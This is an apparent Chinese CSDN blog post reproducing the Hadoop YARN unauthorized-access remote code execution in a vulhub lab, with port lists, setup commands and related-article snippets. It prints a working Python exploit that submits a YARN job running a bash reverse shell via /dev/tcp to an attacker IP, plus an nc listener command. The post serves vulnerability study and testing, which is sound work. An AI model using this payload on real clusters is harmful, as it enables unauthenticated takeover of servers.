Hadoop-未授权访问-内置配合命令执行RCE

于 2024-05-12 22:16:26 发布
阅读量400 收藏 2
点赞数 7
分类专栏: 漏洞复现 文章标签: hadoop 大数据 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MateSnake/article/details/138769895
版权

一、Hadoop常见端口及配置文件

Hadoop中有多种端口,这些端口用于不同的服务和通信。以下是Hadoop中常见的端口以及它们的用途:

NameNode Web界面端口 (默认: 9870)

NameNode 对客户端服务端口 (默认: 8020)

Secondary NameNode Web界面端口 (默认: 9868)

Secondary NameNode 对DN的服务端口 (默认: 50020)

ResourceManager 管理界面端口 (默认: 8088)

DataNode 数据传输端口 (默认: 50010)

DataNode 服务端口 (默认: 50075)

NodeManager 管理界面端口 (默认: 8042)

这些端口可以在Hadoop的配置文件中找到,通常位于$HADOOP_HOME/etc/hadoop/目录下的
core-site.xml, hdfs-site.xml, yarn-site.xml, 和 mapred-site.xml文件中。

二、复现环境

方法一

https://vulfocus.cn/#/dashboard

方法二

用 vulhub 开启环境
切换到漏洞环境目录

cd /root/vulhub/hadoop/unauthorized-yarn

构建(重新构建)项目中的服务容器

docker-compose build

启动已定义在docker-compose.yml文件中的服务容器,并以守护进程的方式在后台运行(启动靶场)

docker-compose up -d

关闭靶场

docker-compose down

三、介绍漏洞

vulhub官方介绍

https://vulhub.org/#/environments/hadoop/unauthorized-yarn/

知道创宇

https://www.seebug.org/search/?keywords=hadoop&category=&level=all

四、演示

访问漏洞靶场

启动漏洞环境,访问漏洞地址

http://123.58.224.8:31227/

漏洞存在判断

访问

http://123.58.224.8:31227/cluster/apps

如果能成功访问说明漏洞存在

开启监听

在监听服务器上开启nc监听

nc -nvlp 9999

exp脚本

反弹shell的exp

import requests

target = 'http://123.58.224.8:31227/'     # 目标地址
lhost = 'x.x.x.x'                         # 接收shell的攻击机ip

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

运行脚本

python exp.py

查看监听服务器

成功反弹shell

Manba_77
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
hadoop-3.3.4 版本(最新版)
12-14
Apache Hadoophadoop-3.3.4.tar.gz)项目为可靠、可扩展的分布式计算开发开源软件。官网下载速度非常缓慢,因此将hadoop-3.3.4 版本放在这里,欢迎大家来下载使用! Hadoop 架构是一个开源的、基于 Java 的编程...
数据库安全:Hadoop 授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3173
Hadoop 授权访问主要因HadoopYARN资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
Hadoop-yarn-授权访问漏洞
qq_42735101的博客
06-26 1970
Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop的某些端口而造成了漏洞。本文是docker中的Hadoop-yarn-授权访问漏洞复现。
Hadoop授权访问漏洞复现
最新发布
2401_83944297的博客
04-11 209
是一个由Apache基金会所开发的分布式系统基础架构。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力进行高速运算和存储。版本3.0.0以下存在Hadoop-yarn-RPC漏洞。启动vulhub靶场。
Hadoop_unauthorized-yarn
qq_56895581的博客
05-19 687
由于服务器的配置不当开放了HFDS的50070及相关服务端口,导致攻击者可以利用命令行直接操作多个目录下的数据(删除、下载、甚至命令执行
数据库安全-Redis授权&Hadoop&Mysql&授权访问&RCE 漏洞复现
rumil的博客
10-13 1329
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的授权常见页面的授权 /admin.php /menu.php常见的授权访问漏洞及默认端口:默认端口统计:8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待。
Hadoop-yarn-授权访问漏洞复
2301_76467680的博客
06-26 872
然后sudo nc -lvvp 4444#在攻击机上用NC工具开启4444侦听端口。然后docker-compose up -d拉取环境。这个是exp写入靶场目录下的exploit.py里面。192.168.127.131:8088#执行exp。用whoami命令显示我们的权限为root。docker ps查看镜像是否启动。先进入vluhub里的靶场目录。然后虚拟机ip+端口去访问页面。就可以反弹shell了。
Hadoop下载 hadoop-3.3.3.tar.gz
07-06
Hadoop是一个由Apache基金会所开发的分布式系统基础架构。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力进 Hadoop是一个由Apache基金会所开发的分布式系统基础架构。用户可以在不...
hudi-hadoop-mr-bundle-0.11.0.jar
06-28
hudi-hadoop-mr-bundle-0.11.0.jar 配合文档
Hadoop下载 hadoop-2.9.2.tar.gz
07-06
Hadoop 是一个处理、存储和分析海量的分布式、非结构化数据的开源框架。最初由 Yahoo 的工程师 Doug Cutting 和 Mike Cafarella Hadoop 是一个处理、存储和分析海量的分布式、非结构化数据的开源框架。最初由 Yahoo...
hadoop-common-2.2.0-bin-master.zip
04-30
hadoop-common-2.2.0-bin-master(包含windows端开发Hadoop和Spark需要的winutils.exe),Windows下IDEA开发Hadoop和Spark程序会报错,原因是因为如果本机操作系统是windows,在程序中使用了hadoop相关的东西,比如写入...
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3030
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
Hadoop Yarn REST API授权漏洞排查
dayouzi的博客
08-14 512
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令
Hadoop-授权访问漏洞复现
weixin_42090431的博客
04-27 709
1、搭建环境 2、访问:http://your-ip:8088。3、EXP 监听9999端口。
Hadopp授权访问导致RCE
qq_69775412的博客
01-25 657
Hadoop是一个开源的分布式计算框架,用于处理大规模数据集的存储和处理。它基于Google的MapReduce算法和Google File System(GFS)的论文,旨在提供一个可靠、可扩展、分布式存储和处理大规模数据的解决方案。漏洞产生原因:负责对资源进行同一管理调度的 ReasourceManager 组件的UI管理界面开放在 8080/8088 端口,攻击者无需认证即可通过REST API 部署任务来执行任意命令,最终可完全控制集群中所有的机器。
Hadoop 授权访问 getshell
weixin_44522540的博客
01-19 4586
漏洞概述 YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为。 受影响范围 Apache Hadoop YARN资源管理系统 环境搭建 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d 环境搭建成功,授权访问到页面 #!/usr
hadoop漏洞_Hadoop 授权访问漏洞(exp核心代码实现)
weixin_35758982的博客
12-06 8354
一、环境搭建:进入镜像目录:cd vulhub/hadoop/unauthorized-yarn启动环境:docker-compose up -d访问8088端口二、漏洞描述:Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,...
Hadoop授权访问 getshell——漏洞复现
2302_79441798的博客
10-17 1007
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
hadoop-env.sh找到命令
06-28
### 回答1: 这个错误提示意味着系统无法找到hadoop-env.sh命令。可能是因为该命令不存在或者没有正确设置环境变量。您可以尝试检查hadoop安装目录下是否存在hadoop-env.sh文件,并且确保环境变量已经正确设置。如果问题仍然存在,您可以尝试重新安装hadoop或者寻求其他解决方案。 ### 回答2: “hadoop-env.sh找到命令”这个错误是在Hadoop安装和使用过程中出现的常见问题之一。通常情况下,这是由于Hadoop环境变量没有正确配置或被更改了导致的。针对这个问题,我们可以采取以下步骤来解决: 1. 查看hadoop-env.sh文件是否存在 首先需要确认hadoop-env.sh文件是否存在于Hadoop的安装目录中。如果文件不存在,则可以重新下载Hadoop并重新安装。 2. 检查hadoop-env.sh文件的路径是否正确 如果hadoop-env.sh文件存在,但仍然出现“找到命令”的错误提示,就需要检查Hadoop的环境变量是否配置正确。可以通过以下命令查看Hadoop的环境变量: $ echo $HADOOP_HOME 该命令将输出Hadoop安装目录的路径。如果该路径不正确,可以使用以下命令修改环境变量: $ export HADOOP_HOME=/path/to/hadoop 其中“/path/to/hadoop”是Hadoop所在的路径。 3. 执行hadoop-env.sh文件 在确认Hadoop的环境变量已经正确配置之后,可以尝试执行hadoop-env.sh文件,命令如下: $ source $HADOOP_HOME/etc/hadoop/hadoop-env.sh 如果执行成功,应该可以在命令行中看到一些Hadoop的配置信息。 4. 重新启动Hadoop服务 最后,如若步骤没有解决问题,可以尝试重新启动Hadoop服务。可以通过以下命令关闭和启动Hadoop: $ stop-all.sh $ start-all.sh 总之,如果出现“hadoop-env.sh找到命令”的错误,首先要检查Hadoop的环境变量是否正确配置,然后执行hadoop-env.sh文件。如果步骤没有解决问题,可以尝试重新启动Hadoop服务。 ### 回答3: Hadoop是一个非常流行的分布式计算平台,它可以很好地处理大规模数据的分布式存储和处理。Hadoop环境的配置对于使用Hadoop来说非常重要,它决定了Hadoop的运行状态。 而hadoop-env.sh找到命令的问题,一般是由于以下几个原因: 1. 没有正确配置Hadoop环境变量 hadoop-env.sh是Hadoop的环境变量脚本,它负责对Hadoop的环境变量进行配置。如果该脚本能找到命令,那么很可能是由于环境变量没有正确配置。 解决办法:可以在hadoop-env.sh中加入正确的环境变量配置,如JAVA_HOME、HADOOP_HOME等,以确保Hadoop的正常运行。 2. hadoop-env.sh文件不存在 如果hadoop-env.sh文件不存在,那么Hadoop将无法正确加载其环境变量。 解决办法:可以通过在Hadoop安装路径下使用命令查找hadoop-env.sh文件的路径,然后将其路径添加到环境变量中。如果找不到该文件,则需要重新安装Hadoop。 3. 系统权限问题 Hadoop需要正确的系统权限才能运行。如果当前用户没有足够的权限,那么将无法正常启动Hadoop。 解决办法:可以尝试以管理员身份运行Hadoop相关命令,以获得足够的权限。 总之,hadoop-env.sh找到命令的问题需要根据具体原因来解决。通过正确配置环境变量、找到并加载hadoop-env.sh文件,以及获得足够的系统权限,可以解决这个问题,并确保Hadoop的正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值